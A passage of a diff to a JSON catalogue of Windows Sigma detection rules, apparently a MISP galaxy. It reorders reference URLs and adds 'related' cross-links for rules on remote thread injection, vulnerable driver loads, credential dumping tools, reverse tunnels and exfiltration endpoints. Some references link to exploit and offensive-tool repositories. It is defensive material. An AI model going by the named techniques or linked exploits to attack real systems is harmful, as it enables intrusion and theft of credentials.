+28509,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ @@ -22620,6 +28522,36 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", "value": "CACTUSTORCH Remote Thread Creation" }, @@ -22636,8 +28568,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "Personal research, statistical analysis", "https://lolbas-project.github.io", + "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" ], "tags": [ @@ -22691,6 +28623,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "value": "Remote Thread Creation Ttdinject.exe Proxy" }, @@ -22715,6 +28656,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", "value": "CreateRemoteThread API and LoadLibrary" }, @@ -22741,6 +28691,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", "value": "PowerShell Rundll32 Remote Thread Creation" }, @@ -22766,6 +28732,22 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "value": "Usage Of Malicious POORTRY Signed Driver" }, @@ -22831,10 +28813,10 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", - "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/fengjixuchui/gdrv-loader", "https://twitter.com/malmoeb/status/1551449425842786306", "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", - "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" ], "tags": [ @@ -22883,18 +28865,18 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/namazso/physmem_drivers", "https://github.com/jbaines-r7/dellicious", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://github.com/stong/CVE-2020-15368", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/namazso/physmem_drivers", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ @@ -22903,6 +28885,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "value": "Vulnerable Driver Load By Name" }, @@ -22927,6 +28918,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "value": "PowerShell Scripts Run by a Services" }, @@ -22979,6 +28979,22 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", "value": "WinDivert Driver Load" }, @@ -22995,22 +29011,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/namazso/physmem_drivers", "https://github.com/jbaines-r7/dellicious", - "https://github.com/stong/CVE-2020-15368", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/stong/CVE-2020-15368", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/namazso/physmem_drivers", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -23019,6 +29035,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "value": "Vulnerable Driver Load" }, @@ -23045,6 +29070,22 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "value": "Vulnerable Dell BIOS Update Driver Load" }, @@ -23076,6 +29117,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", "value": "Credential Dumping Tools Service Execution" }, @@ -23092,8 +29177,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://processhacker.sourceforge.io/", "https://systeminformer.sourceforge.io/", + "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -23103,6 +29188,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", "value": "Process Hacker and System Informer Driver Load" }, @@ -23144,8 +29238,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/alfarom256/CVE-2022-3699/", + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ @@ -23154,6 +29248,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "value": "Vulnerable Lenovo Driver Load" }, @@ -23179,6 +29282,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", "value": "PowerShell Network Connections" }, @@ -23197,8 +29309,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://twitter.com/M_haggis/status/900741347035889665", "https://twitter.com/M_haggis/status/1032799638213066752", + "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ @@ -23208,6 +29320,22 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", "value": "Microsoft Binary Github Communication" }, @@ -23276,9 +29404,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" ], "tags": [ @@ -23287,6 +29415,22 @@ "attack.t1102.001" ] }, + "related": [ + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "value": "Dead Drop Resolvers" }, @@ -23311,6 +29455,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "value": "Script Initiated Connection to Non-Local Network" }, @@ -23350,8 +29503,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" ], "tags": [ @@ -23359,6 +29512,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", "value": "HH.EXE Network Connections" }, @@ -23383,6 +29545,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "value": "Wuauclt Network Connection" }, @@ -23408,6 +29579,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "value": "Rundll32 Internet Connection" }, @@ -23461,6 +29641,22 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", "value": "Regsvr32 Network Activity" }, @@ -23488,6 +29684,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "value": "Remote PowerShell Session (Network)" }, @@ -23514,6 +29726,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "value": "Microsoft Sync Center Suspicious Network Connections" }, @@ -23542,6 +29763,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "value": "RDP to HTTP or HTTPS Target Ports" }, @@ -23568,6 +29798,15 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "value": "Excel Network Connections" }, @@ -23592,6 +29831,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", "value": "Certutil Initiated Connection" }, @@ -23608,8 +29856,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ @@ -23617,6 +29865,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9976fa64-2804-423c-8a5b-646ade840773", "value": "Suspicious Outbound SMTP Connections" }, @@ -23633,10 +29890,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://twitter.com/M_haggis/status/1032799638213066752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -23644,6 +29901,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "value": "Microsoft Binary Suspicious Communication Endpoint" }, @@ -23675,6 +29941,43 @@ "attack.s0508" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", "value": "Communication To Ngrok Tunneling Service" }, @@ -23699,6 +30002,15 @@ "attack.t1571" ] }, + "related": [ + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "value": "Suspicious Typical Malware Back Connect Ports" }, @@ -23723,6 +30035,15 @@ "attack.t1127.001" ] }, + "related": [ + { + "dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "value": "Silenttrinity Stager Msbuild Activity" }, @@ -23770,6 +30091,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", "value": "Script Initiated Connection" }, @@ -23820,6 +30150,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "value": "Suspicious Program Location with Network Connections" }, @@ -23847,6 +30186,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "value": "RDP Over Reverse SSH Tunnel" }, @@ -23863,8 +30211,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ @@ -23872,6 +30220,15 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18249279-932f-45e2-b37a-8925f2597670", "value": "Communication To Ngrok.Io" }, @@ -23888,8 +30245,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ @@ -23897,6 +30254,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", "value": "Download a File with IMEWDBLD.exe" }, @@ -23924,6 +30290,22 @@ "attack.t1559.001" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", "value": "Dllhost Internet Connection" }, @@ -23948,6 +30330,15 @@ "attack.t1218.003" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", "value": "Cmstp Making Network Connection" }, @@ -23964,8 +30355,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" ], "tags": [ @@ -23973,6 +30364,15 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "value": "Equation Editor Network Connection" }, @@ -23989,8 +30389,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": "No established tags" @@ -24011,8 +30411,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://megatools.megous.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -24020,6 +30420,15 @@ "attack.t1567.001" ] }, + "related": [ + { + "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": 